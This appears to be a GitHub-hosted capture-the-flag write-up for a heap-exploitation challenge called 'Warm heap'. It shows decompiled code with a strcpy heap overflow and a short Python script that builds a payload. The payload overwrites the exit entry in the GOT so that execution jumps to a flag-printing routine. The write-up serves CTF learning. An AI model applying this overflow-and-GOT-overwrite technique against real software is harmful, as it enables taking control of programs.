Skip to content

Latest commit

 

History

History

exp100

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
 
 
 
 

Warm heap (Exploit, 100p, 67 solves)

tl;dr Use buffer overflow to overwrite exit in GOT

The included binary contains a buffer overflow at 0x40096E:

  void *v0; // ST10_8@1
  void *v1; // ST18_8@1
  char s; // [sp+20h] [bp-1010h]@1
  __int64 v3; // [sp+1028h] [bp-8h]@1

  v3 = *MK_FP(__FS__, 40LL);
  v0 = malloc(0x10uLL);
  *(_DWORD *)v0 = 1;
  *((_QWORD *)v0 + 1) = malloc(8uLL);
  v1 = malloc(0x10uLL);
  *(_DWORD *)v1 = 2;
  *((_QWORD *)v1 + 1) = malloc(8uLL);
  fgets(&s, 4096, stdin);
  strcpy(*((char **)v0 + 1), &s);
  fgets(&s, 4096, stdin);
  strcpy(*((char **)v1 + 1), &s);
  exit(0);

strcpy copies more bytes that have been allocated, that allows us to overwrite the second strcpy's destination

We have to jump to the subroutine at 0x400826, which prints out the flag for us.

We do that, by overwriting the exit adress in GOT to 0x400826

A final script generating the payload:

import struct

payload = "x"*40+struct.pack("<q", 0x0000000000601068)+"\n"
payload += struct.pack("<q", 0x0000000000400826)+"\n"

f = open('key', 'wb')
f.write(payload)
f.close()